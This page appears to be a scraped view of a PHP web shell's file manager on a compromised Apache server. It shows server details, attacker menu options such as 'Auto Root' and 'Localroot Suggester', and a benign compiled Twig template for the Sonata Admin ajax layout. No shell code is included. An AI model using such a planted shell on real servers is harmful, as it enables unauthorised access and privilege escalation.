Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
v3.cesa.co.za /
var /
cache /
.!!QgY /
twig /
ff /
Delete
Unzip
Name
Size
Permission
Date
Action
.htaccess
237
B
-r-xr-xr-x
2026-08-17 03:12
fff79e93f4c93410ed6c836202751dc5.php
10.68
KB
-rwxrwxr-x
2026-05-18 12:54
Save
Rename
<?php use Twig\Environment; use Twig\Error\LoaderError; use Twig\Error\RuntimeError; use Twig\Extension\CoreExtension; use Twig\Extension\SandboxExtension; use Twig\Markup; use Twig\Sandbox\SecurityError; use Twig\Sandbox\SecurityNotAllowedTagError; use Twig\Sandbox\SecurityNotAllowedFilterError; use Twig\Sandbox\SecurityNotAllowedFunctionError; use Twig\Source; use Twig\Template; use Twig\TemplateWrapper; /* @SonataAdmin/ajax_layout.html.twig */ class __TwigTemplate_0353b0d5a795c3100fc6f5c8e3a29d21 extends Template { private Source $source; /** * @var array<string, Template> */ private array $macros = []; public function __construct(Environment $env) { parent::__construct($env); $this->source = $this->getSourceContext(); $this->parent = false; $this->blocks = [ 'content' => [$this, 'block_content'], 'preview' => [$this, 'block_preview'], 'form' => [$this, 'block_form'], 'list' => [$this, 'block_list'], 'show' => [$this, 'block_show'], ]; } protected function doDisplay(array $context, array $blocks = []): iterable { $macros = $this->macros; // line 11 yield " "; // line 12 yield from $this->unwrap()->yieldBlock('content', $context, $blocks); yield from []; } /** * @return iterable<null|scalar|\Stringable> */ public function block_content(array $context, array $blocks = []): iterable { $macros = $this->macros; // line 13 yield " "; $context["_list_table"] = (( $this->unwrap()->hasBlock("list_table", $context, $blocks)) ? (Twig\Extension\CoreExtension::trim( $this->unwrap()->renderBlock("list_table", $context, $blocks))) : (null)); // line 14 yield " "; $context["_list_filters"] = (( $this->unwrap()->hasBlock("list_filters", $context, $blocks)) ? (Twig\Extension\CoreExtension::trim( $this->unwrap()->renderBlock("list_filters", $context, $blocks))) : (null)); // line 15 yield " "; $context["_list_filters_actions"] = (( $this->unwrap()->hasBlock("list_filters_actions", $context, $blocks)) ? (Twig\Extension\CoreExtension::trim( $this->unwrap()->renderBlock("list_filters_actions", $context, $blocks))) : (null)); // line 16 yield " "; // line 17 yield from $this->unwrap()->yieldBlock('preview', $context, $blocks); // line 18 yield " "; yield from $this->unwrap()->yieldBlock('form', $context, $blocks); // line 19 yield " "; yield from $this->unwrap()->yieldBlock('list', $context, $blocks); // line 20 yield " "; yield from $this->unwrap()->yieldBlock('show', $context, $blocks); // line 21 yield " "; // line 22 if (( !Twig\Extension\CoreExtension::testEmpty(($context["_list_table"] ?? null)) || !Twig\Extension\CoreExtension::testEmpty(($context["_list_filters"] ?? null)))) { // line 23 yield " <div class=\"container-fluid\"> <div class=\"row\"> <div class=\"navbar navbar-default sonata-list-table\"> <div class=\"container-fluid\"> <div class=\"navbar-collapse\"> "; // line 28 if ((((array_key_exists("admin", $context) && array_key_exists("action", $context)) && (($context["action"] ?? null) == "list")) && (Twig\Extension\CoreExtension::length($this->env->getCharset(), CoreExtension::getAttribute($this->env, $this->source, ($context["admin"] ?? null), "listModes", [], "any", false, false, false, 28)) > 1))) { // line 29 yield " <div class=\"nav navbar-right btn-group\"> "; // line 30 $context['_parent'] = $context; $context['_seq'] = CoreExtension::ensureTraversable(CoreExtension::getAttribute($this->env, $this->source, ($context["admin"] ?? null), "listModes", [], "any", false, false, false, 30)); foreach ($context['_seq'] as $context["mode"] => $context["settings"]) { // line 31 yield " <a href=\""; yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape(CoreExtension::getAttribute($this->env, $this->source, ($context["admin"] ?? null), "generateUrl", ["list", Twig\Extension\CoreExtension::merge(CoreExtension::getAttribute($this->env, $this->source, CoreExtension::getAttribute($this->env, $this->source, CoreExtension::getAttribute($this->env, $this->source, ($context["app"] ?? null), "request", [], "any", false, false, false, 31), "query", [], "any", false, false, false, 31), "all", [], "any", false, false, false, 31), ["_list_mode" => $context["mode"]])], "method", false, false, false, 31), "html", null, true); yield "\" class=\"btn btn-default navbar-btn btn-sm"; if ((CoreExtension::getAttribute($this->env, $this->source, ($context["admin"] ?? null), "getListMode", [], "method", false, false, false, 31) == $context["mode"])) { yield " active"; } yield "\"> "; // line 33 yield " "; if (( !CoreExtension::getAttribute($this->env, $this->source, $context["settings"], "icon", [], "any", true, true, false, 33) && CoreExtension::getAttribute($this->env, $this->source, $context["settings"], "class", [], "any", true, true, false, 33))) { // line 34 yield " "; trigger_deprecation('', '', "Relying on the \"class\" setting is deprecated since sonata-project/admin-bundle 4.9, use the \"icon\" setting instead"." in \"@SonataAdmin/ajax_layout.html.twig\" at line 34."); // line 35 yield " <i class=\""; yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape(CoreExtension::getAttribute($this->env, $this->source, $context["settings"], "class", [], "any", false, false, false, 35), "html", null, true); yield "\" aria-hidden=\"true\"></i> "; } else { // line 37 yield " "; yield $this->env->getRuntime('Sonata\AdminBundle\Twig\IconRuntime')->parseIcon(((CoreExtension::getAttribute($this->env, $this->source, $context["settings"], "icon", [], "any", true, true, false, 37)) ? (Twig\Extension\CoreExtension::default(CoreExtension::getAttribute($this->env, $this->source, $context["settings"], "icon", [], "any", false, false, false, 37), "")) : (""))); yield " "; } // line 39 yield " </a> "; } $_parent = $context['_parent']; unset($context['_seq'], $context['mode'], $context['settings'], $context['_parent']); $context = array_intersect_key($context, $_parent) + $_parent; // line 41 yield " </div> "; } // line 43 yield " "; // line 44 if ((($tmp = !Twig\Extension\CoreExtension::testEmpty(($context["_list_filters_actions"] ?? null))) && $tmp instanceof Markup ? (string) $tmp : $tmp)) { // line 45 yield " "; yield ($context["_list_filters_actions"] ?? null); yield " "; } // line 47 yield " </div> </div> </div> </div> "; // line 52 if ((($tmp = Twig\Extension\CoreExtension::trim(($context["_list_filters"] ?? null))) && $tmp instanceof Markup ? (string) $tmp : $tmp)) { // line 53 yield " <div class=\"row\"> "; // line 54 yield ($context["_list_filters"] ?? null); yield " </div> "; } // line 57 yield " <div class=\"row\"> "; // line 59 yield ($context["_list_table"] ?? null); yield " </div> </div> "; } yield from []; } // line 17 /** * @return iterable<null|scalar|\Stringable> */ public function block_preview(array $context, array $blocks = []): iterable { $macros = $this->macros; yield from []; } // line 18 /** * @return iterable<null|scalar|\Stringable> */ public function block_form(array $context, array $blocks = []): iterable { $macros = $this->macros; yield from []; } // line 19 /** * @return iterable<null|scalar|\Stringable> */ public function block_list(array $context, array $blocks = []): iterable { $macros = $this->macros; yield from []; } // line 20 /** * @return iterable<null|scalar|\Stringable> */ public function block_show(array $context, array $blocks = []): iterable { $macros = $this->macros; yield from []; } /** * @codeCoverageIgnore */ public function getTemplateName(): string { return "@SonataAdmin/ajax_layout.html.twig"; } /** * @codeCoverageIgnore */ public function getDebugInfo(): array { return array ( 216 => 20, 206 => 19, 196 => 18, 186 => 17, 176 => 59, 172 => 57, 166 => 54, 163 => 53, 161 => 52, 154 => 47, 148 => 45, 146 => 44, 143 => 43, 139 => 41, 132 => 39, 126 => 37, 120 => 35, 117 => 34, 114 => 33, 105 => 31, 101 => 30, 98 => 29, 96 => 28, 89 => 23, 87 => 22, 84 => 21, 81 => 20, 78 => 19, 75 => 18, 73 => 17, 70 => 16, 67 => 15, 64 => 14, 61 => 13, 50 => 12, 47 => 11,); } public function getSourceContext(): Source { return new Source("", "@SonataAdmin/ajax_layout.html.twig", "/var/www/v3.cesa.co.za/vendor/sonata-project/admin-bundle/src/Resources/views/ajax_layout.html.twig"); } }